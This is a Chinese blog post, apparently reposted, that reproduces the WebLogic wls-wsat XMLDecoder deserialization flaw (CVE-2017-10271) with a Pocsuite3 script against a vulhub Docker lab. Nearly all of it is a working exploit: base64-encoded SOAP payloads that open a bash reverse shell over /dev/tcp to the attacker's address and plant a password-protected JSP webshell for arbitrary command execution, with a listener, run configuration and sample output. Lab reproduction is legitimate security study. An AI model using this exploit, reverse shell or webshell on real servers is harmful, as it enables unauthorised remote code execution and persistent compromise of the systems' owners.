我是靠谱客的博主 苗条冬瓜,最近开发中收集的这篇文章主要介绍Pocsuite3复现Weblogic ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)目录,觉得挺不错的,现在分享给大家,希望可以做个参考。
概述
目录
- 一、安装pocsuite库
- 二、启动漏洞环境
- 三、编写poc脚本(poc.py)
- 四、主程序调用
- 五、执行输出
一、安装pocsuite库
pip3 install pocsuite3==1.6.6
二、启动漏洞环境
docker run -itd --name weblogic -p 7001:7001 vulhub/weblogic:10.3.6.0-2017
三、编写poc脚本(poc.py)
import re
import time
import base64
import socket
import threading
from collections import OrderedDict
from pocsuite3.api import Output, POCBase, register_poc, requests, OptString, OptInteger # POC_CATEGORY
# 反弹shell,用于反弹
console = 'PHNvYXBlbnY6RW52ZWxvcGUgeG1sbnM6c29hcGVudj0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbnZlbG9wZS8iPiA8c29hcGVudjpIZWFkZXI+Cjx3b3JrOldvcmtDb250ZXh0IHhtbG5zOndvcms9Imh0dHA6Ly9iZWEuY29tLzIwMDQvMDYvc29hcC93b3JrYXJlYS8iPgo8amF2YSB2ZXJzaW9uPSIxLjQuMCIgY2xhc3M9ImphdmEuYmVhbnMuWE1MRGVjb2RlciI+Cjx2b2lkIGNsYXNzPSJqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIiPgo8YXJyYXkgY2xhc3M9ImphdmEubGFuZy5TdHJpbmciIGxlbmd0aD0iMyI+Cjx2b2lkIGluZGV4PSIwIj4KPHN0cmluZz4vYmluL2Jhc2g8L3N0cmluZz4KPC92b2lkPgo8dm9pZCBpbmRleD0iMSI+CjxzdHJpbmc+LWM8L3N0cmluZz4KPC92b2lkPgo8dm9pZCBpbmRleD0iMiI+CjxzdHJpbmc+YmFzaCAtaSAmZ3Q7JmFtcDsgL2Rldi90Y3Ave30ve30gMCZndDsmYW1wOzE8L3N0cmluZz4KPC92b2lkPgo8L2FycmF5Pgo8dm9pZCBtZXRob2Q9InN0YXJ0Ii8+PC92b2lkPgo8L2phdmE+Cjwvd29yazpXb3JrQ29udGV4dD4KPC9zb2FwZW52OkhlYWRlcj4KPHNvYXBlbnY6Qm9keS8+Cjwvc29hcGVudjpFbnZlbG9wZT4='
webshell = 'PHNvYXBlbnY6RW52ZWxvcGUgeG1sbnM6c29hcGVudj0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbnZlbG9wZS8iPgo8c29hcGVudjpIZWFkZXI+Cjx3b3JrOldvcmtDb250ZXh0IHhtbG5zOndvcms9Imh0dHA6Ly9iZWEuY29tLzIwMDQvMDYvc29hcC93b3JrYXJlYS8iPgo8amF2YT4KPGphdmEgdmVyc2lvbj0iMS40LjAiIGNsYXNzPSJqYXZhLmJlYW5zLlhNTERlY29kZXIiPgo8b2JqZWN0IGNsYXNzPSJqYXZhLmlvLlByaW50V3JpdGVyIj4gPHN0cmluZz5zZXJ2ZXJzL0FkbWluU2VydmVyL3RtcC9fV0xfaW50ZXJuYWwvd2xzLXdzYXQvNTRwMTd3L3dhci90ZXN0LmpzcDwvc3RyaW5nPgo8dm9pZCBtZXRob2Q9InByaW50bG4iPgo8c3RyaW5nPjwhW0NEQVRBWzwlCiAgICBpZigiMDIzIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoInB3ZCIpKSl7CiAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiaSIpKS5nZXRJbnB1dFN0cmVhbSgpOwogICAgaW50IGEgPSAtMTsKICAgIGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07CiAgICBvdXQucHJpbnQoIjxwcmU+Iik7CiAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgIG91dC5wcmludGxuKG5ldyBTdHJpbmcoYikpOwogICAgfQogICAgb3V0LnByaW50KCI8L3ByZT4iKTsKfQolPl1dPjwvc3RyaW5nPgo8L3ZvaWQ+Cjx2b2lkIG1ldGhvZD0iY2xvc2UiLz4KPC9vYmplY3Q+CjwvamF2YT4KPC9qYXZhPgo8L3dvcms6V29ya0NvbnRleHQ+Cjwvc29hcGVudjpIZWFkZXI+Cjxzb2FwZW52OkJvZHkvPgo8L3NvYXBlbnY6RW52ZWxvcGU+'
def get_host_ip():
"""查询本机ip地址"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
ip = s.getsockname()[0]
except Exception as e:
print("查询本机ip地址失败.", e)
return False
finally:
s.close()
return ip
class WlsPOC(POCBase):
vulID = 'CVE-2017-10271'
vulDate = '2017-10-23'
vulType = 'RCE'
name = "Weblogic 'wls-wsat' XMLDecoder 反序列化漏洞"
appName = 'Weblogic'
appVersion = '12.2.1.2' # test_version=10.3.6
desc = "Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。"
def _options(self):
# 传进来的
o = OrderedDict()
o["_host"] = OptString('', description='端口可缺省, 比如80的http, 443的https', require=True)
o["_target"] = OptString('', description='ip或者域名', require=True)
o["_port"] = OptString('80', description='端口', require=True)
o["_schema"] = OptString('http', description='协议', require=False)
o["_command"] = OptString('pwd', description='嵌套shell命令', require=False)
# 类属性的
o["reflect_port"] = OptInteger(0, description='反弹攻击方端口', require=False)
o["reflect_data"] = OptString('', description='接收反弹消息', require=False)
return o
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
def _attack(self):
return self._verify()
def work(self, host: str):
'''有数据即可'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 2.绑定
s.bind((host, 0))
# 3.监听
s.listen(1)
s.settimeout(20)
self.set_option("reflect_port", s.getsockname()[1])
# 4.处理
try:
c, addr = s.accept()
msg = c.recv(1024)
print("==>", msg)
self.set_option("reflect_data", msg)
c.close()
except socket.timeout:
print("读超时异常")
pass # 读超时异常, 超过一定时间就会抛, 但是会继续监听,需要设定settimeout, 取消继续监听
finally:
s.close()
def _verify(self):
# 0 基础属性
url = '{}://{}/wls-wsat/CoordinatorPortType'.format(self.get_option("_schema"), self.get_option("_host"))
headers = {
'Host': self.get_option("_host"),
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
'Connection': 'close',
'Content-Type': 'text/xml',
}
print(url)
# 1.漏洞验证监听端口
# 1.1 先获取本机IP
local_ip = get_host_ip()
if not local_ip:
return self.parse_output({})
# 1.2 启动监听程序
print("启动监听程序")
t = threading.Thread(target=self.work, args=(local_ip,), daemon=True) # 设置daemon为True, 主进程结束杀死其所有子线程
t.start()
# 1.3 一秒后尝试反弹shell
time.sleep(1)
payload = str(base64.b64decode(console), encoding='utf-8').format(local_ip, self.get_option("reflect_port"))
requests.post(url, headers=headers, verify=False, data=payload, timeout=10)
t.join(20) # 主进程超时时间10秒(阻塞等待socker接收结果)
# 1.4 判断返回内容
if not self.get_option("reflect_data"):
print("判断返回内容")
return self.parse_output({})
# 1.5 写入结果
verify = {
"url": url,
"payload": base64.b64encode(payload.encode('utf-8')).decode('utf-8'),
"desc": "Verify Successully.",
"result": self.get_option("reflect_data")
}
# 2.1 注入webshell
payload = str(base64.b64decode(webshell), encoding='utf-8')
requests.post(url, headers=headers, verify=False, timeout=5, data=payload)
# 2.2 尝试访问是否成功
check_url = '{}://{}/wls-wsat/test.jsp?pwd=023&i={}'.format(self.get_option("_schema"), self.get_option("_host"), self.get_option("_command"))
# print(check_url)
resp = requests.get(url=check_url, headers=headers, verify=False, timeout=5)
if resp.status_code == 200:
text = resp.text
return self.parse_output({
"verify": {
"url": check_url,
"payload": webshell,
"result": "通过该漏洞入口注入webshell, 用户可借此远程执行命令. RCE got data: {}".format(re.sub(u'u0000', '', text))
},
"session": {
"method": 1, # 1-任意浏览器, 2-ie浏览器
"desc": "打开浏览器访问URL即可借此远程执行命令",
"url": check_url,
}
})
return self.parse_output({"verify": verify})
register_poc(WlsPOC)
四、主程序调用
from pocsuite3.api import init_pocsuite
from pocsuite3.api import start_pocsuite
from pocsuite3.api import get_results
import json
config = {
'url': {'http://192.168.1.200:7001'},
'poc': {'./poc.py'},
'_host': '192.168.1.200:7001',
'_target': '192.168.1.200',
'_port': '7001',
'_schema': 'http',
'_command': 'whoami',
}
# config字典的配置和cli命令行参数配置一模一样
init_pocsuite(config)
start_pocsuite()
result = get_results().pop().result
print(json.dumps(result))
五、执行输出
'''
{
"verify":{
"url":"http://192.168.1.200:7001/wls-wsat/CoordinatorPortType",
"payload":"PHNvYXBlbnY6RW52ZWxvcGUgeG1sbnM6c29hcGVudj0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbnZlbG9wZS8iPiA8c29hcGVudjpIZWFkZXI+Cjx3b3JrOldvcmtDb250ZXh0IHhtbG5zOndvcms9Imh0dHA6Ly9iZWEuY29tLzIwMDQvMDYvc29hcC93b3JrYXJlYS8iPgo8amF2YSB2ZXJzaW9uPSIxLjQuMCIgY2xhc3M9ImphdmEuYmVhbnMuWE1MRGVjb2RlciI+Cjx2b2lkIGNsYXNzPSJqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIiPgo8YXJyYXkgY2xhc3M9ImphdmEubGFuZy5TdHJpbmciIGxlbmd0aD0iMyI+Cjx2b2lkIGluZGV4PSIwIj4KPHN0cmluZz4vYmluL2Jhc2g8L3N0cmluZz4KPC92b2lkPgo8dm9pZCBpbmRleD0iMSI+CjxzdHJpbmc+LWM8L3N0cmluZz4KPC92b2lkPgo8dm9pZCBpbmRleD0iMiI+CjxzdHJpbmc+YmFzaCAtaSAmZ3Q7JmFtcDsgL2Rldi90Y3AvMTcyLjMxLjUwLjI0OS81NjUwNiAwJmd0OyZhbXA7MTwvc3RyaW5nPgo8L3ZvaWQ+CjwvYXJyYXk+Cjx2b2lkIG1ldGhvZD0ic3RhcnQiLz48L3ZvaWQ+CjwvamF2YT4KPC93b3JrOldvcmtDb250ZXh0Pgo8L3NvYXBlbnY6SGVhZGVyPgo8c29hcGVudjpCb2R5Lz4KPC9zb2FwZW52OkVudmVsb3BlPg==",
"result":"b'bash: cannot set terminal process group (1): Inappropriate ioctl for devicen'"
},
"session":{
"method":1,
"desc":"打开浏览器访问URL即可",
"url":"http://192.168.1.200:7001/wls-wsat/test.jsp?pwd=023&i=pwd"
}
}
'''
最后
以上就是苗条冬瓜为你收集整理的Pocsuite3复现Weblogic ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)目录的全部内容,希望文章能够帮你解决Pocsuite3复现Weblogic ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)目录所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复